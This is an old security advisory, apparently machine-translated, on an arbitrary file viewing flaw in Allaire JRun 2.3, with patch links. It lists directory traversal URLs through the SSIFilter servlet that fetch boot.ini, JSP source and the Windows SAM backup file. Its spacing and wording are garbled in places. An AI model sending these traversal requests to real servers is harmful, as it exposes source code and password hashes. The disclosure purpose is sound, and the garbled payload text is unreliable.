Involved program: JRUN description: AllaireJRUN2.3 view arbitrary file vulnerability details: Allaire JRUN Server 2.3 has multiple display code vulnerabilities. This vulnerability allows attackers to view the source code of arbitrary files in the root directory on the WEB server. JRun2.3 uses assumervlets to parse various types of pages (such as HTML, JSP, and JRun)
Involved procedures:
JRUN
Description:
Allaire JRUN 2.3 Arbitrary file viewing vulnerability
Details:
The JRUN Server 2.3 of Allaire has the multiple display code vulnerability. This vulnerability allows attackers to view the source code of arbitrary files in the root directory on the WEB server.
JRun 2.3 uses Java Servlets to parse various types of pages (such as HTML and JSP ). Based on the file settings of rules. properties and servlets. properties, you may use the URL prefix "/servlet/" to call any servlet.
It may use the SSIFilter servlet of Jrun to retrieve arbitrary files on the target system. The following two examples show the URLs that can be used to retrieve arbitrary files:
Http: // jrun: 8000/servlet/com. livesoftware. jrun. plugins. ssi. SSIFilter/.../../t
Est. jsp
Http: // jrun: 8000/servlet/com. livesoftware. jrun. plugins. ssi. SSIFilter /../../.
./../Boot. ini
Http: // jrun: 8000/servlet/com. livesoftware. jrun. plugins. ssi. SSIFilter /../../.
./.../../Winnt/repair/sam ._
Http: // jrun: 8000/servlet/ssifilter/.../../test. jsp
Http: // jrun: 8000/servlet/ssifilter/.../../boot. ini
Http: // jrun: 8000/servlet/ssifilter/.../../winnt/repair/sam ._
Note: assume that JRun runs on the host "jrun" and port 8000.
Affected systems:
Allaire JRun 2.3.x
Solution:
Download and install the patch:
Allaire patch jr233p_ASB00_28_29
Http://download.allaire.com/jrun/jr233p_ASB00_28_29.zip
Windows 95/98/NT/2000 and Windows NT Alpha
Allaire patch jr233p_ASB00_28_29tar
Http://download.allaire.com/jrun/jr233p_ASB00_28_29.tar.gz
UNIX/Linux patch-GNU gzip/tar